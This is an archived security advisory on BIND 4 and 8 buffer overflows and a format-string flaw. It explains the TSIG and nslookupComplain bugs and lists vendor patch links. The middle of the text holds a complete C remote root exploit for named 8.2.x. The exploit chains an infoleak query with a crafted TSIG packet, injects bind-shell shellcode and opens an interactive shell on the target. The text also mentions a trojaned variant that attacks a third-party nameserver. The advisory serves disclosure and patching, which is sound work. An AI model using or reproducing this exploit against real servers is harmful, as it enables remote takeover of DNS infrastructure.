COMMAND
BIND
SYSTEMS AFFECTED
BIND 4 and 8
PROBLEM
Following is based on a Covert Security Advisory COVERT-2001-01.
BIND 8 contains a buffer overflow that allows a remote attacker to
execute arbitrary code. The overflow is in the initial processing
of a DNS request and therefore does not require an attacker to
control an authoritative DNS server. In addition, the
vulnerability is not dependent upon configuration options and
affects both recursive and non-recursive servers. This
vulnerability has been designated as CVE candidate CAN-2001-10.
BIND 4 contains a buffer overflow that can allow a remote attacker
to execute arbitrary code. The overflow occurs when BIND reports
an error while attempting to locate IP addresses for name servers.
Exploitation of this vulnerability is restricted by the fact that
the target name server be recursive and that the attacker has
control of an authoritative DNS server. This vulnerability has
been designated as CVE candidate CAN-2001-11.
BIND 4 contains a format string vulnerability that can allow a
remote attacker to execute arbitrary code. This vulnerability
also occurs when BIND reports an error while attempting to locate
IP addresses for name servers, and thus has the same restrictions
on exploitation as the buffer overflow. This vulnerability was
fixed several versions prior to the current version of BIND 4,
but is still present in certain Unix distributions. This
vulnerability has been designated as CVE candidate CAN-2001-13.
BIND (Berkeley Internet Name Domain) is an implementation of the
DNS (Domain Name System) protocol distributed by the Internet
Software Consortium (www.isc.org). Two versions of BIND
distributed by the ISC, BIND version 4 and BIND version 8, are
vulnerable to the attacks described in this advisory. The most
recent release of BIND, version 9, is not susceptible to these
attacks.
BIND version 8 contains a buffer overflow in the implementation
of Transaction Signatures (TSIG) for DNS security as defined in
RFC 2845. Because the overflow occurs within the initial
processing of a DNS request, both recursive and non-recursive DNS
servers are vulnerable, independent of the DNS security
configuration. The mechanisms employed by the DNS server make it
susceptible to two potential methods of attack.
An attacker can perform a stack based buffer overflow, with two
important qualifications: first, that the number of bytes past the
end of the buffer that the attacker can overwrite is limited in
length, and second, that the values of those bytes are mostly
fixed. On the x86 architecture, the attacker can manipulate a
sufficient number of bytes such that they can modify the saved
frame pointer. Overwriting the least significant byte of the
saved frame pointer can result in the execution of arbitrary code
in certain predictable installations of the name server. The
"infoleak" bug, discovered by Claudio Musmarra, and described in
CERT advisory CA-2001-02, permits an attacker to remotely retrieve
stack frames from named, which allows for direct calculation of
the effect of the one byte overflow.
An attacker can also perform a heap overflow, overwriting malloc's
internal variables. This method is very effective, though it
requires that an operating system's implementation of malloc
stores internal data structures in the allocated memory. For this
attack to be successful, TCP port 53 must be accessible.
BIND version 4 contains a buffer overflow in a section of code
that formulates a warning message for a call to syslog. There
are several conditions that can lead to the triggering of this
overflow, all of which involve the resolution of NS records into
IP addresses. This vulnerability is a standard stack overflow,
but the information an attacker is able to present is limited to
printable characters. This limitation makes susceptibility to
exploitation contingent upon the layout of the named process
within memory, and possibly upon the amount of memory available
to be allocated by the name server.
In older versions of BIND 4, the previously mentioned call to
syslog utilizes a user controllable string as the second argument,
which creates an exploitable condition. The same restriction
applies, in that the format string is limited to printable
characters. Despite this restriction, a remote attacker is still
able to create a malicious format string to exploit the vulnerable
syslog function call.
The BIND 8 vulnerability is the result of a DNS request utilizing
a particular code path that invalidates the logic used to
calculate the length of the request buffer.
When a request is received, it is either stored in the heap or on
the stack, depending on the transport mechanism. Upon receipt of
a UDP request, it is read into a 513 byte buffer on the stack
called "u.buf" by the function datagram_read(). When a TCP
request is received, the message is read by stream_getlen() into
a 64k buffer called "sp->s_buf", which is allocated from the heap
for every socket. An interesting feature of BIND is that it uses
the incoming buffer of both transport mechanisms to read the
request from the network and then modifies it to create an
appropriate response. Two key variables are maintained to track
the usage of the buffer: one containing the actual length of the
data in the buffer, called "msglen", and a second variable
"buflen" that tracks the remaining length free in the buffer.
When a DNS message is received, msglen is initialized to the
length of data received from the network. With a UDP message,
this is the amount of data returned by a recvfrom() call, whereas
with a TCP message, it is the value provided as the length by the
client. buflen is set to the size of the buffer used to read the
message (512 for UDP, 64k for TCP).
Under normal circumstances, as BIND processes a request, it
appends the answer, authoritative, and additional records to the
query. It then modifies the DNS header to reflect these changes
and delivers the response. During this processing, msglen will
reflect the length of the response as it is being formed, and
buflen will be used to track the remaining space available in the
buffer. Throughout the processing, BIND assumes that msglen plus
buflen will equal the original length of the buffer.
Upon receipt of a DNS message, it is processed as either a request
or response based upon the query response flag set in the message
header. If a request is received, BIND then determines whether it
is a query, iquery, update or notification. Beginning with BIND
8.2, prior to request processing, the additional section of the
DNS message is examined for a TSIG resource record. The function
ns_find_tsig() is called to perform this functionality as well as
to enforce a basic level of validity on the TSIG resource record.
If a valid TSIG is identified but an appropriate security key can
not be found, an error is signaled and BIND bypasses the normal
request processing. As a result, msglen and buflen remain close
to their initial values, instead of being set to their "working"
values.
BIND processes the request as an error since a TSIG was identified
but an appropriate security key was not found. As part of the
error generation, BIND reuses the request buffer and appends a
TSIG after the question section. At this point, BIND assumes that
the size of the request is msglen plus buflen which, under normal
circumstances, would be correct. However, in this special case,
the request was never processed and "msglen + buflen" is in fact
almost twice the size of the original buffer. BIND is then
willing to append a TSIG via ns_sign() beyond the limits of the
buffer.
Since a valid security key was not found, ns_sign() will only
append a small number of bytes with limited values. As mentioned
above, this makes the vulnerable BIND installation susceptible to
two types of attack.
Combining this oversight with the way a compiler positions the
stack variables in datagram_read(), it is possible for an attacker
to overwrite portions of the saved stack activation records in
datagram_read() with certain fixed values. In this case,
executing arbitrary code is possible under the x86 architecture by
overwriting the saved frame pointer's least significant byte with
zero resulting in the saved frame pointer pointing into the
original DNS request in the majority of cases.
Predicting the effect of this one byte overflow can be difficult
as it varies depending upon how BIND was started. However, the
"infoleak" bug allows an attacker to retrieve the stack activation
record of datagram_read(). This information can then be used to
calculate the exact number of bytes that will displace the frame
pointer when the least significant byte of the saved ebp is
overwritten with 0.
The second method of attack utilizes certain implementations of
dynamic memory allocation. It is possible to overwrite malloc's
boundary tags with predictable values, changing the standard
libraries' notion of the length of the buffer following the
buffer processed in the DNS request. Thus, the next set of
boundary information is read from within a buffer that an
attacker can control, allowing for a malicious pointer overwrite
upon compaction.
This technique is applicable to malloc implementations that store
linkage information in the actual allocated memory. The following
implementations are known by COVERT to be exploitable: IRIX libc,
Linux glibc, and Solaris libc.
The BIND 4 vulnerability is a sprintf into a 999 byte stack buffer
that occurs when BIND formulates a message warning the
administrator of an inconsistency or error resolving a Name Server
record to an IP address. The vulnerability occurs within
nslookupComplain(), which is a static utility function used by
nslookup().
When BIND encounters a query that it can not answer from its cache
or zone files, it attempts to forward the query to a name server
that is capable of resolving it or referring BIND to a more
appropriate server. When BIND forwards a query, it creates a
qinfo structure to keep track of the request. It also creates
this structure in order to track requests initiated by itself in
order to find various linkage information. BIND can determine
potential name servers for which to forward to by walking through
each label in the query in its database, looking for stored NS
records.
The purpose of the nslookup() function is to take a list of NS
records and populate a qinfo structure with their corresponding IP
addresses. BIND can then use those IP addresses as a list of
name servers for which to attempt forwarding or sending a query.
nslookup() performs certain sanity checks on the information that
it retrieves. For example, if it finds that a particular name
server has an IP address of 0.0.0.0, 255.255.255.255, or a
multicast address, then it will flag this condition as an error,
warn the administrator via syslog, and move on to the next NS
record. The function nslookupComplain() is called to warn the
administrator and, as mentioned above, contains a stack overflow.
In order to trigger this overflow, an attacker needs to get BIND
to cache an NS record with a very large length. Furthermore, the
attacker needs to cache a record for the resolution of the NS
record that contains one of the problem conditions for the
logging. This is achievable by sending a query to a recursive
name server, asking it to resolve a large name that is under the
authority of a malicious name server. The malicious name server
then needs to refer the request to another name server also with
a large name, and provide an additional record giving an invalid
address for that name server.
The limitations placed upon the character set allowed in domain
names makes the construction of a viable return address difficult.
However, there is a potential for an attacker to make the name
server return into memory that the attacker has forced the name
server to allocate. In this case, vulnerability is contingent
upon the location of the heap and the amount of memory available,
as well as whether or not the operating system has a policy of
lazy swap page allocation as opposed to an eager reservation
policy. COVERT has verified that it is possible to exploit named
running under Linux by growing the heap to sizes that far exceed
that amount of memory and swap available. This was performed by
utilizing specific patterns of memory allocation that maximize
untouched memory.
The situation may be further complicated by the overwriting of two
other stack based buffers, nsbuf and abuf, which are read from
within the same sprintf that overflows the stack based buffer.
This does not come in to play, however, if the value chosen to
overwrite the saved return address does not utilize the
terminating null byte of the string. It is worth noting that
this behavior could make it easier for an attacker to exploit the
problem under operating systems that implement sprintf such that
overlapping copies are handled correctly.
The format string vulnerability in BIND 4 occurs in the syslog
call in nslookupComplain(). This vulnerability is in the same
section of code as the previously described buffer overflow, and
thus can be triggered in a similar fashion by using an
authoritative name server under malicious control. This
vulnerability was corrected in bind-4.9.5-P1, although certain
vendors' named implementations based upon this code remain
vulnerable.
Discovery and documentation of these vulnerabilities was conducted
by Anthony Osborne and John McDonald of the COVERT Labs at PGP
Security.
Note that there is trojan exploit going around. It attacks
dns1.nai.com. Please beware of running code such as this. It
will do it's best to attack NAI's nameserver. It's a typical,
though well disguised, shellcode trick. Look in the Linux
shellcode:
\xa1\x45\x03\x96 == 161.69.3.150 == dns1.nai.com
It overflows its own buffer in the set_ptr function and changes
the return address to point into the shellcode.
/*
* This exploit has been fixed and extensive explanation and clarification
* added.
* Cleanup done by:
* Ian Goldberg <ian@cypherpunks.ca>
* Jonathan Wilkins <jwilkins@bitland.net>
* NOTE: the default installation of RedHat 6.2 seems to not be affected
* due to the compiler options. If BIND is built from source then the
* bug is able to manifest itself.
*/
/*
* Original Comment:
* lame named 8.2.x remote exploit by
*
* Ix [adresadeforward@yahoo.com] (the master of jmpz),
* lucysoft [lucysoft@hotmail.com] (the master of queries)
*
* this exploits the named INFOLEAK and TSIG bug (see http://www.isc.org/products/BIND/bind-security.html)
* linux only shellcode
* this is only for demo purposes, we are not responsable in any way for what you do with this code.
*
* flamez - canaris
* greetz - blizzard, netman.
* creditz - anathema <anathema@hack.co.za> for the original shellcode
* - additional code ripped from statdx exploit by ron1n
*
* woo, almost forgot... this exploit is pretty much broken (+4 errors), but we hope you got the idea.
* if you understand how it works, it won't be too hard to un-broke it
*/
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>
#define max(a,b) ((a)>(b)?(a):(b))
#define BUFFSIZE 4096
int argevdisp1, argevdisp2;
char shellcode[] =
/* The numbers at the right indicate the number of bytes the call takes
* and the number of bytes used so far. This needs to be lower than
* 62 in order to fit in a single Query Record. 2 are used in total to
* send the shell code
*/
/* main: */
/* "callz" is more than 127 bytes away, so we jump to an intermediate
spot first */
"\xeb\x44" /* jmp intr */ // 2 - 2
/* start: */
"\x5e" /* popl %esi */ // 1 - 3
/* socket() */
"\x29\xc0" /* subl %eax, %eax */ // 2 - 5
"\x89\x46\x10" /* movl %eax, 0x10(%esi) */ // 3 - 8
"\x40" /* incl %eax */ // 1 - 9
"\x89\xc3" /* movl %eax, %ebx */ // 2 - 11
"\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */ // 3 - 14
"\x40" /* incl %eax */ // 1 - 15
"\x89\x46\x08" /* movl %eax, 0x08(%esi) */ // 3 - 18
"\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */ // 3 - 21
"\xb0\x66" /* movb $0x66, %al */ // 2 - 23
"\xcd\x80" /* int $0x80 */ // 2 - 25
/* bind() */
"\x43" /* incl %ebx */ // 1 - 26
"\xc6\x46\x10\x10" /* movb $0x10, 0x10(%esi) */ // 4 - 30
"\x66\x89\x5e\x14" /* movw %bx, 0x14(%esi) */ // 4 - 34
"\x88\x46\x08" /* movb %al, 0x08(%esi) */ // 3 - 37
"\x29\xc0" /* subl %eax, %eax */ // 2 - 39
"\x89\xc2" /* movl %eax, %edx */ // 2 - 41
"\x89\x46\x18" /* movl %eax, 0x18(%esi) */ // 3 - 44
/*
* the port address in hex (0x9000 = 36864), if this is changed, then a similar
* change must be made in the connection() call
* NOTE: you only get to set the high byte
*/
"\xb0\x90" /* movb $0x90, %al */ // 2 - 46
"\x66\x89\x46\x16" /* movw %ax, 0x16(%esi) */ // 4 - 50
"\x8d\x4e\x14" /* leal 0x14(%esi), %ecx */ // 3 - 53
"\x89\x4e\x0c" /* movl %ecx, 0x0c(%esi) */ // 3 - 56
"\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */ // 3 - 59
"\xeb\x02" /* jmp cont */ // 2 - 2
/* intr: */
"\xeb\x43" /* jmp callz */ // 2 - 4
/* cont: */
"\xb0\x66" /* movb $0x66, %al */ // 2 - 6
"\xcd\x80" /* int $0x80 */ // 2 - 10
/* listen() */
"\x89\x5e\x0c" /* movl %ebx, 0x0c(%esi) */ // 3 - 11
"\x43" /* incl %ebx */ // 1 - 12
"\x43" /* incl %ebx */ // 1 - 13
"\xb0\x66" /* movb $0x66, %al */ // 2 - 15
"\xcd\x80" /* int $0x80 */ // 2 - 17
/* accept() */
"\x89\x56\x0c" /* movl %edx, 0x0c(%esi) */ // 3 - 20
"\x89\x56\x10" /* movl %edx, 0x10(%esi) */ // 3 - 23
"\xb0\x66" /* movb $0x66, %al */ // 2 - 25
"\x43" /* incl %ebx */ // 1 - 26
"\xcd\x80" /* int $0x80 */ // 1 - 27
/* dup2(s, 0); dup2(s, 1); dup2(s, 2); */
"\x86\xc3" /* xchgb %al, %bl */ // 2 - 29
"\xb0\x3f" /* movb $0x3f, %al */ // 2 - 31
"\x29\xc9" /* subl %ecx, %ecx */ // 2 - 33
"\xcd\x80" /* int $0x80 */ // 2 - 35
"\xb0\x3f" /* movb $0x3f, %al */ // 2 - 37
"\x41" /* incl %ecx */ // 1 - 38
"\xcd\x80" /* int $0x80 */ // 2 - 40
"\xb0\x3f" /* movb $0x3f, %al */ // 2 - 42
"\x41" /* incl %ecx */ // 1 - 43
"\xcd\x80" /* int $0x80 */ // 2 - 45
/* execve() */
"\x88\x56\x07" /* movb %dl, 0x07(%esi) */ // 3 - 48
"\x89\x76\x0c" /* movl %esi, 0x0c(%esi) */ // 3 - 51
"\x87\xf3" /* xchgl %esi, %ebx */ // 2 - 53
"\x8d\x4b\x0c" /* leal 0x0c(%ebx), %ecx */ // 3 - 56
"\xb0\x0b" /* movb $0x0b, %al */ // 2 - 58
"\xcd\x80" /* int $0x80 */ // 2 - 60
"\x90"
/* callz: */
"\xe8\x72\xff\xff\xff" /* call start */ // 5 - 5
"/bin/sh"; /* There's a NUL at the end here */ // 8 - 13
unsigned long resolve_host(char* host)
{
long res;
struct hostent* he;
if (0 > (res = inet_addr(host)))
{
if (!(he = gethostbyname(host)))
return(0);
res = *(unsigned long*)he->h_addr;
}
return(res);
}
int dumpbuf(char *buff, int len)
{
char line[17];
int x;
/* print out a pretty hex dump */
for(x=0;x<len;x++){
if(!(x%16) && x){
line[16] = 0;
printf("\t%s\n", line);
}
printf("%02X ", (unsigned char)buff[x]);
if(isprint((unsigned char)buff[x]))
line[x%16]=buff[x];
else
line[x%16]='.';
}
printf("\n");
}
void
runshell(int sockd)
{
char buff[1024];
int fmax, ret;
fd_set fds;
fmax = max(fileno(stdin), sockd) + 1;
send(sockd, "uname -a; id;\n", 15, 0);
for(;;)
{
FD_ZERO(&fds);
FD_SET(fileno(stdin), &fds);
FD_SET(sockd, &fds);
if(select(fmax, &fds, NULL, NULL, NULL) < 0)
{
exit(EXIT_FAILURE);
}
if(FD_ISSET(sockd, &fds))
{
bzero(buff, sizeof buff);
if((ret = recv(sockd, buff, sizeof buff, 0)) < 0)
{
exit(EXIT_FAILURE);
}
if(!ret)
{
fprintf(stderr, "Connection closed\n");
exit(EXIT_FAILURE);
}
write(fileno(stdout), buff, ret);
}
if(FD_ISSET(fileno(stdin), &fds))
{
bzero(buff, sizeof buff);
ret = read(fileno(stdin), buff, sizeof buff);
if(send(sockd, buff, ret, 0) != ret)
{
fprintf(stderr, "Transmission loss\n");
exit(EXIT_FAILURE);
}
}
}
}
connection(struct sockaddr_in host)
{
int sockd;
host.sin_port = htons(36864);
printf("[*] connecting..\n");
usleep(2000);
if((sockd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
{
exit(EXIT_FAILURE);
}
if(connect(sockd, (struct sockaddr *) &host, sizeof host) != -1)
{
printf("[*] wait for your shell..\n");
usleep(500);
runshell(sockd);
}
else
{
printf("[x] error: named not vulnerable or wrong offsets used\n");
}
close(sockd);
}
int infoleak_qry(char* buff)
{
HEADER* hdr;
int n, k;
char* ptr;
int qry_space = 12;
int dummy_names = 7;
int evil_size = 0xff;
memset(buff, 0, BUFFSIZE);
hdr = (HEADER*)buff;
hdr->id = htons(0xbeef);
hdr->opcode = IQUERY;
hdr->rd = 1;
hdr->ra = 1;
hdr->qdcount = htons(0);
hdr->nscount = htons(0);
hdr->ancount = htons(1);
hdr->arcount = htons(0);
ptr = buff + sizeof(HEADER);
printf("[d] HEADER is %d long\n", sizeof(HEADER));
n = 62;
for(k=0; k < dummy_names; k++)
{
*ptr++ = n;
ptr += n;
}
ptr += 1;
PUTSHORT(1/*ns_t_a*/, ptr); /* type */
PUTSHORT(T_A, ptr); /* class */
PUTLONG(1, ptr); /* ttl */
PUTSHORT(evil_size, ptr); /* our *evil* size */
return(ptr - buff + qry_space);
}
int evil_query(char* buff, int offset)
{
int lameaddr, shelladdr, rroffsetidx, rrshellidx, deplshellcode, offset0;
HEADER* hdr;
char *ptr;
int k, bufflen;
u_int n, m;
u_short s;
int i;
int shelloff, shellstarted, shelldone;
int towrite, ourpack;
int n_dummy_rrs = 7;
printf("[d] evil_query(buff, %08x)\n", offset);
printf("[d] shellcode is %d long\n", sizeof(shellcode));
shelladdr = offset - 0x200;
lameaddr = shelladdr + 0x300;
ourpack = offset - 0x250 + 2;
towrite = (offset & ~0xff) - ourpack - 6;
printf("[d] olb = %d\n", (unsigned char) (offset & 0xff));
rroffsetidx = towrite / 70;
offset0 = towrite - rroffsetidx * 70;
if ((offset0 > 52) || (rroffsetidx > 6))
{
printf("[x] could not write our data in buffer (offset0=%d, rroffsetidx=%d)\n", offset0, rroffsetidx);
return(-1);
}
rrshellidx = 1;
deplshellcode = 2;
hdr = (HEADER*)buff;
memset(buff, 0, BUFFSIZE);
/* complete the header */
hdr->id = htons(0xdead);
hdr->opcode = QUERY;
hdr->rd = 1;
hdr->ra = 1;
hdr->qdcount = htons(n_dummy_rrs);
hdr->ancount = htons(0);
hdr->arcount = htons(1);
ptr = buff + sizeof(HEADER);
shellstarted = 0;
shelldone = 0;
shelloff = 0;
n = 63;
for (k = 0; k < n_dummy_rrs; k++)
{
*ptr++ = (char)n;
for(i = 0; i < n-2; i++)
{
if((k == rrshellidx) && (i == deplshellcode) && !shellstarted)
{
printf("[*] injecting shellcode at %d\n", k);
shellstarted = 1;
}
if ((k == rroffsetidx) && (i == offset0))
{
*ptr++ = lameaddr & 0x000000ff;
*ptr++ = (lameaddr & 0x0000ff00) >> 8;
*ptr++ = (lameaddr & 0x00ff0000) >> 16;
*ptr++ = (lameaddr & 0xff000000) >> 24;
*ptr++ = shelladdr & 0x000000ff;
*ptr++ = (shelladdr & 0x0000ff00) >> 8;
*ptr++ = (shelladdr & 0x00ff0000) >> 16;
*ptr++ = (shelladdr & 0xff000000) >> 24;
*ptr++ = argevdisp1 & 0x000000ff;
*ptr++ = (argevdisp1 & 0x0000ff00) >> 8;
*ptr++ = (argevdisp1 & 0x00ff0000) >> 16;
*ptr++ = (argevdisp1 & 0xff000000) >> 24;
*ptr++ = argevdisp2 & 0x000000ff;
*ptr++ = (argevdisp2 & 0x0000ff00) >> 8;
*ptr++ = (argevdisp2 & 0x00ff0000) >> 16;
*ptr++ = (argevdisp2 & 0xff000000) >> 24;
i += 15;
}
else
{
if (shellstarted && !shelldone)
{
*ptr++ = shellcode[shelloff++];
if(shelloff == (sizeof(shellcode)))
shelldone=1;
}
else
{
*ptr++ = i;
}
}
}
/* OK: this next set of bytes constitutes the end of the
* NAME field, the QTYPE field, and the QCLASS field.
* We have to have the shellcode skip over these bytes,
* as well as the leading 0x3f (63) byte for the next
* NAME field. We do that by putting a jmp instruction
* here.
*/
*ptr++ = 0xeb;
if (k == 0)
{
*ptr++ = 10;
/* For alignment reasons, we need to stick an extra
* NAME segment in here, of length 3 (2 + header).
*/
m = 2;
*ptr++ = (char)m; // header
ptr += 2;
}
else
{
*ptr++ = 0x07;
}
/* End the NAME with a compressed pointer. Note that it's
* not clear that the value used, C0 00, is legal (it
* points to the beginning of the packet), but BIND apparently
* treats such things as name terminators, anyway.
*/
*ptr++ = 0xc0; /*NS_CMPRSFLGS*/
*ptr++ = 0x00; /*NS_CMPRSFLGS*/
ptr += 4; /* QTYPE, QCLASS */
}
/* Now we make the TSIG AR */
*ptr++ = 0x00; /* Empty name */
PUTSHORT(0xfa, ptr); /* Type TSIG */
PUTSHORT(0xff, ptr); /* Class ANY */
bufflen = ptr - buff;
// dumpbuf(buff, bufflen);
return(bufflen);
}
long xtract_offset(char* buff, int len)
{
long ret;
/* Here be dragons. */
/* (But seriously, the values here depend on compilation options
* used for BIND.
*/
ret = *((long*)&buff[0x214]);
argevdisp1 = 0x080d7cd0;
argevdisp2 = *((long*)&buff[0x264]);
printf("[d] argevdisp1 = %08x, argevdisp2 = %08x\n",
argevdisp1, argevdisp2);
// dumpbuf(buff, len);
return(ret);
}
int main(int argc, char* argv[])
{
struct sockaddr_in sa;
int sock;
long address;
char buff[BUFFSIZE];
int len, i;
long offset;
socklen_t reclen;
unsigned char foo[4];
printf("[*] named 8.2.x (< 8.2.3-REL) remote root exploit by lucysoft, Ix\n");
printf("[*] fixed by ian@cypherpunks.ca and jwilkins@bitland.net\n\n");
address = 0;
if (argc < 2)
{
printf("[*] usage : %s host\n", argv[0]);
return(-1);
}
if (!(address = resolve_host(argv[1])))
{
printf("[x] unable to resolve %s, try using an IP address\n", argv[1]);
return(-1);
} else {
memcpy(foo, &address, 4);
printf("[*] attacking %s (%d.%d.%d.%d)\n", argv[1], foo[0], foo[1], foo[2], foo[3]);
}
sa.sin_family = AF_INET;
if (0 > (sock = socket(sa.sin_family, SOCK_DGRAM, 0)))
{
return(-1);
}
sa.sin_family = AF_INET;
sa.sin_port = htons(53);
sa.sin_addr.s_addr= address;
len = infoleak_qry(buff);
printf("[d] infoleak_qry was %d long\n", len);
len = sendto(sock, buff, len, 0 , (struct sockaddr *)&sa, sizeof(sa));
if (len < 0)
{
printf("[*] unable to send iquery\n");
return(-1);
}
reclen = sizeof(sa);
len = recvfrom(sock, buff, BUFFSIZE, 0, (struct sockaddr *)&sa, &reclen);
if (len < 0)
{
printf("[x] unable to receive iquery answer\n");
return(-1);
}
printf("[*] iquery resp len = %d\n", len);
offset = xtract_offset(buff, len);
printf("[*] retrieved stack offset = %x\n", offset);
len = evil_query(buff, offset);
if(len < 0){
printf("[x] error sending tsig packet\n");
return(0);
}
sendto(sock, buff, len, 0 , (struct sockaddr *)&sa, sizeof(sa));
if (0 > close(sock))
{
return(-1);
}
connection(sa);
return(0);
}
SOLUTION
ISC has produced patches to address these issues. Except as
otherwise noted above, BIND version 4.9.8 and 8.2.3 resolve the
vulnerabilities described in this advisory. For ISC's description
of these problems:
http://www.isc.org/products/BIND/bind-security.html
To download updated versions of BIND:
ftp://ftp.isc.org/isc/bind/src/
For Caldera Systems:
ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/RPMS/
ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/SRPMS
RPMS/bind-8.2.3-1.i386.rpm
RPMS/bind-doc-8.2.3-1.i386.rpm
RPMS/bind-utils-8.2.3-1.i386.rpm
SRPMS/bind-8.2.3-1.src.rpm
ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/RPMS/
ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/SRPMS
RPMS/bind-8.2.3-1.i386.rpm
RPMS/bind-doc-8.2.3-1.i386.rpm
RPMS/bind-utils-8.2.3-1.i386.rpm
SRPMS/bind-8.2.3-1.src.rpm
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/RPMS/
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/SRPMS
RPMS/bind-8.2.3-1.i386.rpm
RPMS/bind-doc-8.2.3-1.i386.rpm
RPMS/bind-utils-8.2.3-1.i386.rpm
SRPMS/bind-8.2.3-1.src.rpm
For Immunix OS:
http://immunix.org/ImmunixOS/6.2/updates/RPMS/bind-8.2.3-0.6.x_StackGuard.i386.rpm
http://immunix.org/ImmunixOS/6.2/updates/RPMS/bind-devel-8.2.3-0.6.x_StackGuard.i386.rpm
http://immunix.org/ImmunixOS/6.2/updates/RPMS/bind-utils-8.2.3-0.6.x_StackGuard.i386.rpm
http://immunix.org/ImmunixOS/6.2/updates/SRPMS/bind-8.2.3-0.6.x_StackGuard.src.rpm
http://immunix.org/ImmunixOS/7.0-beta/updates/RPMS/bind-8.2.3-1_StackGuard.i386.rpm
http://immunix.org/ImmunixOS/7.0-beta/updates/RPMS/bind-devel-8.2.3-1_StackGuard.i386.rpm
http://immunix.org/ImmunixOS/7.0-beta/updates/RPMS/bind-utils-8.2.3-1_StackGuard.i386.rpm
http://immunix.org/ImmunixOS/7.0-beta/updates/SRPMS/bind-8.2.3-1_StackGuard.src.rpm
For Linux-Mandrake:
Linux-Mandrake 6.0: 6.0/RPMS/bind-8.2.3-1.3mdk.i586.rpm
6.0/RPMS/bind-devel-8.2.3-1.3mdk.i586.rpm
6.0/RPMS/bind-utils-8.2.3-1.3mdk.i586.rpm
6.0/SRPMS/bind-8.2.3-1.3mdk.src.rpm
Linux-Mandrake 6.1: 6.1/RPMS/bind-8.2.3-1.2mdk.i586.rpm
6.1/RPMS/bind-devel-8.2.3-1.2mdk.i586.rpm
6.1/RPMS/bind-utils-8.2.3-1.2mdk.i586.rpm
6.1/SRPMS/bind-8.2.3-1.2mdk.src.rpm
Linux-Mandrake 7.0: 7.0/RPMS/bind-8.2.3-1.2mdk.i586.rpm
7.0/RPMS/bind-devel-8.2.3-1.2mdk.i586.rpm
7.0/RPMS/bind-utils-8.2.3-1.2mdk.i586.rpm
7.0/SRPMS/bind-8.2.3-1.2mdk.src.rpm
Linux-Mandrake 7.1: 7.1/RPMS/bind-8.2.3-1.2mdk.i586.rpm
7.1/RPMS/bind-devel-8.2.3-1.2mdk.i586.rpm
7.1/RPMS/bind-utils-8.2.3-1.2mdk.i586.rpm
7.1/SRPMS/bind-8.2.3-1.2mdk.src.rpm
Linux-Mandrake 7.2: 7.2/RPMS/bind-8.2.3-1.1mdk.i586.rpm
7.2/RPMS/bind-devel-8.2.3-1.1mdk.i586.rpm
7.2/RPMS/bind-utils-8.2.3-1.1mdk.i586.rpm
7.2/SRPMS/bind-8.2.3-1.1mdk.src.rpm
Corporate Server 1.0.1: 1.0.1/RPMS/bind-8.2.3-1.2mdk.i586.rpm
1.0.1/RPMS/bind-devel-8.2.3-1.2mdk.i586.rpm
1.0.1/RPMS/bind-utils-8.2.3-1.2mdk.i586.rpm
1.0.1/SRPMS/bind-8.2.3-1.2mdk.src.rpm
For SuSE Linux:
ftp://ftp.suse.com/pub/suse/i386/update/7.1/n2/bind8-8.2.3-92.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/7.1/zq1/bind8-8.2.3-92.src.rpm
ftp://ftp.suse.com/pub/suse/i386/update/7.0/n1/bind8-8.2.3-61.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/7.0/zq1/bind8-8.2.3-61.src.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.4/n1/bind8-8.2.3-0.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.4/zq1/bind8-8.2.3-0.src.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.3/n1/bind8-8.2.3-0.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.3/zq1/bind8-8.2.3-0.src.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.2/n1/bind8-8.2.3-0.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.2/zq1/bind8-8.2.3-0.src.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.1/n1/bind8-8.2.3-0.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.1/zq1/bind8-8.2.3-0.src.rpm
ftp://ftp.suse.com/pub/suse/axp/update/7.0/n1/bind8-8.2.3-39.alpha.rpm
ftp://ftp.suse.com/pub/suse/axp/update/7.0/zq1/bind8-8.2.3-39.src.rpm
ftp://ftp.suse.com/pub/suse/axp/update/6.4/n1/bind8-8.2.3-0.alpha.rpm
ftp://ftp.suse.com/pub/suse/axp/update/6.4/zq1/bind8-8.2.3-0.src.rpm
ftp://ftp.suse.com/pub/suse/axp/update/6.3/n1/bind8-8.2.3-0.alpha.rpm
ftp://ftp.suse.com/pub/suse/axp/update/6.3/zq1/bind8-8.2.3-0.src.rpm
ftp://ftp.suse.com/pub/suse/axp/update/6.1/n1/bind8-8.2.3-0.alpha.rpm
ftp://ftp.suse.com/pub/suse/axp/update/6.1/zq1/bind8-8.2.3-0.src.rpm
ftp://ftp.suse.com/pub/suse/ppc/update/7.0/n1/bind8-8.2.3-39.ppc.rpm
ftp://ftp.suse.com/pub/suse/ppc/update/7.0/zq1/bind8-8.2.3-39.src.rpm
ftp://ftp.suse.com/pub/suse/ppc/update/6.4/n1/bind8-8.2.3-0.ppc.rpm
ftp://ftp.suse.com/pub/suse/ppc/update/6.4/zq1/bind8-8.2.3-0.src.rpm
For Conectiva Linux:
ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/bind-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/bind-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/bind-devel-8.2.3-1cl.i386.rpm
